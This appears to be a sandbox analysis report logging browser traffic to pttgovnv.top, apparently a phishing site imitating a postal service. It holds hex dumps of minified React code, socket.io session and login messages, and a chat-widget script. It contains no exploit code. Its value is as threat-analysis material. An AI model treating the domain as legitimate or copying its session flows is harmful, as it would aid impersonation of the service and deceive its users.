          Data Ascii: "\n"),o=l.length-1,u=a.length-1;1<=o&&0<=u&&l[o]!==a[u];)u--;for(;1<=o&&0<=u;o--,u--)if(l[o]!==a[u]){if(1!==o||1!==u)do{if(o--,0>--u||l[o]!==a[u]){var i="\n"+l[o].replace(" at new "," at ");return e.displayName&&i.includes("<anonymous>")&&(i=i.replace("<a
          2024-09-01 22:25:36 UTC7271INData Raw: 61 79 3a 21 30 2c 73 74 72 6f 6b 65 44 61 73 68 6f 66 66 73 65 74 3a 21 30 2c 73 74 72 6f 6b 65 4d 69 74 65 72 6c 69 6d 69 74 3a 21 30 2c 73 74 72 6f 6b 65 4f 70 61 63 69 74 79 3a 21 30 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 21 30 7d 2c 6d 65 3d 5b 22 57 65 62 6b 69 74 22 2c 22 6d 73 22 2c 22 4d 6f 7a 22 2c 22 4f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 68 65 28 65 2c 6e 2c 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6e 7c 7c 22 62 6f 6f 6c 65 61 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 6e 7c 7c 22 22 3d 3d 3d 6e 3f 22 22 3a 74 7c 7c 22 6e 75 6d 62 65 72 22 21 3d 3d 74 79 70 65 6f 66 20 6e 7c 7c 30 3d 3d 3d 6e 7c 7c 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 70 65 5b 65 5d 3f 28 22 22 2b 6e 29 2e 74 72 69 6d 28 29 3a 6e 2b 22 70 78 22 7d
          Data Ascii: ay:!0,strokeDashoffset:!0,strokeMiterlimit:!0,strokeOpacity:!0,strokeWidth:!0},me=["Webkit","ms","Moz","O"];function he(e,n,t){return null==n||"boolean"===typeof n||""===n?"":t||"number"!==typeof n||0===n||pe.hasOwnProperty(e)&&pe[e]?(""+n).trim():n+"px"}
          2024-09-01 22:25:36 UTC7271INData Raw: 72 2c 6e 3d 65 2e 74 61 72 67 65 74 43 6f 6e 74 61 69 6e 65 72 73 2c 6e 75 6c 6c 21 3d 3d 6c 26 26 2d 31 3d 3d 3d 6e 2e 69 6e 64 65 78 4f 66 28 6c 29 26 26 6e 2e 70 75 73 68 28 6c 29 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 55 6e 28 65 29 7b 76 61 72 20 6e 3d 79 6c 28 65 2e 74 61 72 67 65 74 29 3b 69 66 28 6e 75 6c 6c 21 3d 3d 6e 29 7b 76 61 72 20 74 3d 6a 65 28 6e 29 3b 69 66 28 6e 75 6c 6c 21 3d 3d 74 29 69 66 28 31 33 3d 3d 3d 28 6e 3d 74 2e 74 61 67 29 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 28 6e 3d 42 65 28 74 29 29 29 72 65 74 75 72 6e 20 65 2e 62 6c 6f 63 6b 65 64 4f 6e 3d 6e 2c 76 6f 69 64 20 43 6e 28 65 2e 70 72 69 6f 72 69 74 79 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 45 6e 28 74 29 7d 29 29 7d 65 6c 73 65 20 69 66 28 33 3d 3d 3d 6e 26 26 74 2e 73 74
          Data Ascii: r,n=e.targetContainers,null!==l&&-1===n.indexOf(l)&&n.push(l),e)}function Un(e){var n=yl(e.target);if(null!==n){var t=je(n);if(null!==t)if(13===(n=t.tag)){if(null!==(n=Be(t)))return e.blockedOn=n,void Cn(e.priority,(function(){En(t)}))}else if(3===n&&t.st
          2024-09-01 22:25:36 UTC7271INData Raw: 43 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 6b 65 79 64 6f 77 6e 22 3d 3d 3d 65 2e 74 79 70 65 7c 7c 22 6b 65 79 75 70 22 3d 3d 3d 65 2e 74 79 70 65 3f 65 2e 6b 65 79 43 6f 64 65 3a 30 7d 2c 77 68 69 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 6b 65 79 70 72 65 73 73 22 3d 3d 3d 65 2e 74 79 70 65 3f 74 74 28 65 29 3a 22 6b 65 79 64 6f 77 6e 22 3d 3d 3d 65 2e 74 79 70 65 7c 7c 22 6b 65 79 75 70 22 3d 3d 3d 65 2e 74 79 70 65 3f 65 2e 6b 65 79 43 6f 64 65 3a 30 7d 7d 29 2c 50 74 3d 61 74 28 43 74 29 2c 4e 74 3d 61 74 28 49 28 7b 7d 2c 70 74 2c 7b 70 6f 69 6e 74 65 72 49 64 3a 30 2c 77 69 64 74 68 3a 30 2c 68 65 69 67 68 74 3a 30 2c 70 72 65 73 73 75 72 65 3a 30 2c 74 61 6e 67 65 6e 74 69 61 6c 50 72 65 73 73
          Data Ascii: Code:function(e){return"keydown"===e.type||"keyup"===e.type?e.keyCode:0},which:function(e){return"keypress"===e.type?tt(e):"keydown"===e.type||"keyup"===e.type?e.keyCode:0}}),Pt=at(Ct),Nt=at(I({},pt,{pointerId:0,width:0,height:0,pressure:0,tangentialPress
          2024-09-01 22:25:36 UTC7271INData Raw: 22 6f 6e 43 68 61 6e 67 65 22 2c 22 63 68 61 6e 67 65 20 63 6c 69 63 6b 20 66 6f 63 75 73 69 6e 20 66 6f 63 75 73 6f 75 74 20 69 6e 70 75 74 20 6b 65 79 64 6f 77 6e 20 6b 65 79 75 70 20 73 65 6c 65 63 74 69 6f 6e 63 68 61 6e 67 65 22 2e 73 70 6c 69 74 28 22 20 22 29 29 2c 69 28 22 6f 6e 53 65 6c 65 63 74 22 2c 22 66 6f 63 75 73 6f 75 74 20 63 6f 6e 74 65 78 74 6d 65 6e 75 20 64 72 61 67 65 6e 64 20 66 6f 63 75 73 69 6e 20 6b 65 79 64 6f 77 6e 20 6b 65 79 75 70 20 6d 6f 75 73 65 64 6f 77 6e 20 6d 6f 75 73 65 75 70 20 73 65 6c 65 63 74 69 6f 6e 63 68 61 6e 67 65 22 2e 73 70 6c 69 74 28 22 20 22 29 29 2c 69 28 22 6f 6e 42 65 66 6f 72 65 49 6e 70 75 74 22 2c 5b 22 63 6f 6d 70 6f 73 69 74 69 6f 6e 65 6e 64 22 2c 22 6b 65 79 70 72 65 73 73 22 2c 22 74 65 78 74
          Data Ascii: "onChange","change click focusin focusout input keydown keyup selectionchange".split(" ")),i("onSelect","focusout contextmenu dragend focusin keydown keyup mousedown mouseup selectionchange".split(" ")),i("onBeforeInput",["compositionend","keypress","text
          2024-09-01 22:25:36 UTC7271INData Raw: 61 67 29 3b 72 65 74 75 72 6e 20 65 7c 7c 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 72 28 65 2c 6e 2c 74 2c 72 2c 6c 29 7b 66 6f 72 28 76 61 72 20 61 3d 6e 2e 5f 72 65 61 63 74 4e 61 6d 65 2c 6f 3d 5b 5d 3b 6e 75 6c 6c 21 3d 3d 74 26 26 74 21 3d 3d 72 3b 29 7b 76 61 72 20 75 3d 74 2c 69 3d 75 2e 61 6c 74 65 72 6e 61 74 65 2c 73 3d 75 2e 73 74 61 74 65 4e 6f 64 65 3b 69 66 28 6e 75 6c 6c 21 3d 3d 69 26 26 69 3d 3d 3d 72 29 62 72 65 61 6b 3b 35 3d 3d 3d 75 2e 74 61 67 26 26 6e 75 6c 6c 21 3d 3d 73 26 26 28 75 3d 73 2c 6c 3f 6e 75 6c 6c 21 3d 28 69 3d 52 65 28 74 2c 61 29 29 26 26 6f 2e 75 6e 73 68 69 66 74 28 57 72 28 74 2c 69 2c 75 29 29 3a 6c 7c 7c 6e 75 6c 6c 21 3d 28 69 3d 52 65 28 74 2c 61 29 29 26 26 6f 2e 70 75 73 68 28 57 72 28 74 2c 69 2c 75 29
          Data Ascii: ag);return e||null}function Kr(e,n,t,r,l){for(var a=n._reactName,o=[];null!==t&&t!==r;){var u=t,i=u.alternate,s=u.stateNode;if(null!==i&&i===r)break;5===u.tag&&null!==s&&(u=s,l?null!=(i=Re(t,a))&&o.unshift(Wr(t,i,u)):l||null!=(i=Re(t,a))&&o.push(Wr(t,i,u)
          2024-09-01 22:25:36 UTC7271INData Raw: 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 6e 2c 6e 75 6c 6c 21 3d 3d 28 74 3d 65 2e 61 6c 74 65 72 6e 61 74 65 29 26 26 28 74 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 6e 29 2c 74 3d 65 2c 65 3d 65 2e 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 33 3d 3d 3d 74 2e 74 61 67 3f 74 2e 73 74 61 74 65 4e 6f 64 65 3a 6e 75 6c 6c 7d 76 61 72 20 54 61 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 4c 61 28 65 29 7b 65 2e 75 70 64 61 74 65 51 75 65 75 65 3d 7b 62 61 73 65 53 74 61 74 65 3a 65 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 2c 66 69 72 73 74 42 61 73 65 55 70 64 61 74 65 3a 6e 75 6c 6c 2c 6c 61 73 74 42 61 73 65 55 70 64 61 74 65 3a 6e 75 6c 6c 2c 73 68 61 72 65 64 3a 7b 70 65 6e 64 69 6e 67 3a 6e 75 6c 6c 2c 69 6e 74 65 72 6c 65 61 76 65 64 3a 6e 75 6c 6c 2c 6c 61 6e 65
          Data Ascii: .childLanes|=n,null!==(t=e.alternate)&&(t.childLanes|=n),t=e,e=e.return;return 3===t.tag?t.stateNode:null}var Ta=!1;function La(e){e.updateQueue={baseState:e.memoizedState,firstBaseUpdate:null,lastBaseUpdate:null,shared:{pending:null,interleaved:null,lane
          2024-09-01 22:25:36 UTC7271INData Raw: 5d 29 29 2e 72 65 74 75 72 6e 3d 65 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 6e 2c 74 2c 72 2c 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 37 21 3d 3d 6e 2e 74 61 67 3f 28 28 6e 3d 4f 73 28 74 2c 65 2e 6d 6f 64 65 2c 72 2c 61 29 29 2e 72 65 74 75 72 6e 3d 65 2c 6e 29 3a 28 28 6e 3d 6c 28 6e 2c 74 29 29 2e 72 65 74 75 72 6e 3d 65 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 6e 2c 74 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 6e 26 26 22 22 21 3d 3d 6e 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 79 70 65 6f 66 20 6e 29 72 65 74 75 72 6e 28 6e 3d 49 73 28 22 22 2b 6e 2c 65 2e 6d 6f 64 65 2c 74 29 29 2e 72 65 74 75 72 6e 3d 65 2c 6e 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 6e 26
          Data Ascii: ])).return=e,n)}function f(e,n,t,r,a){return null===n||7!==n.tag?((n=Os(t,e.mode,r,a)).return=e,n):((n=l(n,t)).return=e,n)}function d(e,n,t){if("string"===typeof n&&""!==n||"number"===typeof n)return(n=Is(""+n,e.mode,t)).return=e,n;if("object"===typeof n&
          2024-09-01 22:25:36 UTC7271INData Raw: 74 63 68 2c 6c 3d 74 2e 70 65 6e 64 69 6e 67 2c 6f 3d 6e 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 3b 69 66 28 6e 75 6c 6c 21 3d 3d 6c 29 7b 74 2e 70 65 6e 64 69 6e 67 3d 6e 75 6c 6c 3b 76 61 72 20 75 3d 6c 3d 6c 2e 6e 65 78 74 3b 64 6f 7b 6f 3d 65 28 6f 2c 75 2e 61 63 74 69 6f 6e 29 2c 75 3d 75 2e 6e 65 78 74 7d 77 68 69 6c 65 28 75 21 3d 3d 6c 29 3b 75 72 28 6f 2c 6e 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 29 7c 7c 28 6b 75 3d 21 30 29 2c 6e 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 3d 6f 2c 6e 75 6c 6c 3d 3d 3d 6e 2e 62 61 73 65 51 75 65 75 65 26 26 28 6e 2e 62 61 73 65 53 74 61 74 65 3d 6f 29 2c 74 2e 6c 61 73 74 52 65 6e 64 65 72 65 64 53 74 61 74 65 3d 6f 7d 72 65 74 75 72 6e 5b 6f 2c 72 5d 7d 66 75 6e 63 74 69 6f 6e 20 4c 6f 28 29 7b 7d 66 75 6e
          Data Ascii: tch,l=t.pending,o=n.memoizedState;if(null!==l){t.pending=null;var u=l=l.next;do{o=e(o,u.action),u=u.next}while(u!==l);ur(o,n.memoizedState)||(ku=!0),n.memoizedState=o,null===n.baseQueue&&(n.baseState=o),t.lastRenderedState=o}return[o,r]}function Lo(){}fun


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          136192.168.2.449883104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:35 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P6liOS7&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:36 UTC620INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:36 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 98
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PFE6%2BZmzgwTwPuuElvOW2ohcNn%2FHpkBXGY1YyLOZVLoNVlVZ29sstRnp5eeVRkwyOafzDpwPd3V9Bv5uKgzg7IR8%2BIeQI0bCwCUU5vw2tfSPC6mvav7KaEsFCvBt4N0%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad580be01a07-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:36 UTC98INData Raw: 34 33 35 5b 7b 22 63 6f 64 65 22 3a 30 2c 22 6d 73 67 22 3a 22 6f 6b 22 2c 22 74 69 6d 65 22 3a 22 53 75 6e 20 53 65 70 20 30 31 20 32 30 32 34 20 32 32 3a 32 35 3a 33 35 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 22 7d 5d
          Data Ascii: 435[{"code":0,"msg":"ok","time":"Sun Sep 01 2024 22:25:35 GMT+0000 (Coordinated Universal Time)"}]


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          137192.168.2.449884172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:35 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P6liOkF&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:36 UTC614INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:36 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 58
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3VbSgYFBFs7ifYrQniWJ1AWFX0tCjhAl5RcMei1LB63D6vhzG1W9ipYlkuRBAtAFgFEmUxFI3fnKsvzyI3DV9Ilf8tE132KNIibMdoOsffzPdcXIF56ABUUueZEgvAo%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad580f254235-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:36 UTC58INData Raw: 34 32 5b 22 6f 6e 6c 69 6e 65 2d 63 6f 75 6e 74 2d 75 73 65 72 22 2c 34 2c 22 75 73 65 72 2d 66 33 55 32 44 6f 4a 6a 5a 48 43 50 65 63 57 6b 42 51 55 44 22 2c 74 72 75 65 5d
          Data Ascii: 42["online-count-user",4,"user-f3U2DoJjZHCPecWkBQUD",true]


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          138192.168.2.449882104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:35 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P6liOSJ&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:36 UTC619INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:36 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 1
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gz%2FdhxPeczBB09gbiVSqc5meszWXsmasvzL3nSahtM4dyChLY980iy2pXiF2nAQV2Cz%2BQqtQbE3rV37p4tdiSoxvVH9oxd5Qu%2BHFU3XjeJqlHi6BhNLpueWszOKR3w4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad582f2680dc-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:36 UTC1INData Raw: 31
          Data Ascii: 1


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          139192.168.2.449885172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:35 UTC670OUTPOST /socket.io/?EIO=4&transport=polling&t=P6liOkJ&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          Content-Length: 49
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          Content-type: text/plain;charset=UTF-8
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Origin: https://pttgovnv.top
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:35 UTC49OUTData Raw: 34 32 35 5b 22 6c 6f 67 69 6e 22 2c 22 75 73 65 72 2d 66 33 55 32 44 6f 4a 6a 5a 48 43 50 65 63 57 6b 42 51 55 44 22 2c 5b 22 75 73 65 72 22 5d 5d
          Data Ascii: 425["login","user-f3U2DoJjZHCPecWkBQUD",["user"]]
          2024-09-01 22:25:36 UTC614INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:36 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kNA7HiNUakMmwL%2FCaPAqaZwdDBKPq7xIaNVAuxfa27NBHh38m1Xaj2DSh8xFZ%2B0FMK9stInNd4LbVNZWVrscjf7eTAn4%2BG%2Bvxf3Y5ic1VJBrEej8rtPn8YTCIAfgzA8%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad5828030f7f-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:36 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
          Data Ascii: 2ok
          2024-09-01 22:25:36 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          140192.168.2.44988635.201.78.44443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:35 UTC461OUTGET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1
          Host: pttem.alo-tech.com
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:36 UTC701INHTTP/1.1 200 OK
          content-type: application/javascript
          access-control-allow-origin: *
          access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, Tenant
          x-content-type-options: nosniff
          Strict-Transport-Security: max-age=31536000; includeSubDomains;
          x-namespace: pttem.alo-tech.com
          x-frame-options: SAMEORIGIN
          vary: Accept-Language
          content-language: tr
          referrer-policy: same-origin
          cross-origin-opener-policy: same-origin
          x-cloud-trace-context: 2f156e9638d529f8d1faa008cfe15d9c
          date: Sun, 01 Sep 2024 22:25:36 GMT
          server: Google Frontend
          Content-Length: 17555
          via: 1.1 google
          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
          Connection: close
          2024-09-01 22:25:36 UTC689INData Raw: 76 61 72 20 61 63 6a 73 46 75 6c 6c 73 69 7a 65 20 3d 20 66 61 6c 73 65 3b 76 61 72 20 4d 4f 42 49 4c 45 5f 53 43 52 45 45 4e 2c 66 6f 63 75 73 5f 69 6e 74 65 72 76 61 6c 3d 30 2c 61 63 6a 73 5f 6e 65 61 72 5f 6c 65 66 74 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 41 6c 6f 43 68 61 74 44 72 61 77 28 74 29 7b 76 61 72 20 65 2c 61 2c 6f 3b 41 6c 6f 43 68 61 74 2e 61 6c 6f 63 68 61 74 5f 70 61 67 65 5f 74 69 74 6c 65 3d 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 2c 41 6c 6f 43 68 61 74 2e 6d 75 74 65 43 68 61 74 3d 21 31 2c 30 3c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 77 69 64 67 65 74 22 29 2e 6c 65 6e 67 74 68 3f 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 63 68 61 74
          Data Ascii: var acjsFullsize = false;var MOBILE_SCREEN,focus_interval=0,acjs_near_left=!1;function AloChatDraw(t){var e,a,o;AloChat.alochat_page_title=document.title,AloChat.muteChat=!1,0<document.getElementsByClassName("alotech-chat-widget").length?console.log("chat
          2024-09-01 22:25:36 UTC1390INData Raw: 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 6d 61 73 74 65 72 50 61 67 65 43 73 73 5b 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 77 69 64 67 65 74 22 5d 2e 66 75 6c 6c 73 69 7a 65 5f 73 74 61 74 75 73 2e 68 65 69 67 68 74 29 2c 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 69 6e 20 6d 61 73 74 65 72 50 61 67 65 43 73 73 29 26 26 6d 61 73 74 65 72 50 61 67 65 43 73 73 5b 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 5d 2e 66 75 6c 6c 73 69 7a 65 5f 73 74 61 74 75 73 26 26 6d 61 73 74 65 72 50 61 67 65 43 73 73 5b 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 5d 2e 66 75 6c 6c 73 69 7a 65 5f 73 74 61 74 75 73 2e 68 65 69 67 68 74 26 26 28 61 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 6d 61 73 74 65 72 50 61 67 65 43 73
          Data Ascii: style.height=masterPageCss[".alotech-chat-widget"].fullsize_status.height),".alotech-chat-body"in masterPageCss)&&masterPageCss[".alotech-chat-body"].fullsize_status&&masterPageCss[".alotech-chat-body"].fullsize_status.height&&(a.style.height=masterPageCs
          2024-09-01 22:25:36 UTC1390INData Raw: 2b 74 2b 22 3d 22 3b 66 6f 72 28 76 61 72 20 6f 2c 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 73 3d 30 3b 73 3c 69 2e 6c 65 6e 67 74 68 3b 73 2b 2b 29 7b 66 6f 72 28 76 61 72 20 6e 3d 69 5b 73 5d 3b 22 20 22 3d 3d 6e 2e 63 68 61 72 41 74 28 30 29 3b 29 6e 3d 6e 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 69 66 28 30 3d 3d 6e 2e 69 6e 64 65 78 4f 66 28 6f 29 29 72 65 74 75 72 6e 20 6e 2e 73 75 62 73 74 72 69 6e 67 28 6f 2e 6c 65 6e 67 74 68 2c 6e 2e 6c 65 6e 67 74 68 29 7d 72 65 74 75 72 6e 22 22 7d 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 41 6c 6f 54 65 63 68 47 41 45 76 65 6e 74 73 28 74 2c 65 2c 61 2c 6f 2c 69 2c 73 2c 6e 29 7b 22 6f 6e 22 3d 3d 3d 74 26 26 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 5f
          Data Ascii: +t+"=";for(var o,i=document.cookie.split(";"),s=0;s<i.length;s++){for(var n=i[s];" "==n.charAt(0);)n=n.substring(1);if(0==n.indexOf(o))return n.substring(o.length,n.length)}return""}function sendAloTechGAEvents(t,e,a,o,i,s,n){"on"===t&&aloTechGetCookie("_
          2024-09-01 22:25:36 UTC1390INData Raw: 65 20 69 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 69 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 31 3d 3d 69 2e 72 65 61 64 79 53 74 61 74 65 26 26 65 2e 62 65 66 6f 72 65 53 65 6e 64 28 29 2c 34 3d 3d 69 2e 72 65 61 64 79 53 74 61 74 65 26 26 28 65 2e 63 6f 6d 70 6c 65 74 65 28 69 2c 69 2e 73 74 61 74 75 73 29 2c 32 30 30 3d 3d 69 2e 73 74 61 74 75 73 7c 7c 30 3d 3d 69 2e 73 74 61 74 75 73 3f 65 2e 73 75 63 63 65 73 73 28 4a 53 4f 4e 2e 70 61 72 73 65 28 69 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 29 3a 28 65 2e 65 72 72 6f 72 28 69 2e 73 74 61 74 75 73 29 2c 76 6f 69 64 20 30 21 3d 3d 65 2e 73 74 61 74 75 73 43 6f 64 65 5b 69 2e 73 74 61 74 75 73 5d 26 26 65 2e 73 74 61 74 75 73 43 6f
          Data Ascii: e i=new XMLHttpRequest;i.onreadystatechange=function(){1==i.readyState&&e.beforeSend(),4==i.readyState&&(e.complete(i,i.status),200==i.status||0==i.status?e.success(JSON.parse(i.responseText)):(e.error(i.status),void 0!==e.statusCode[i.status]&&e.statusCo
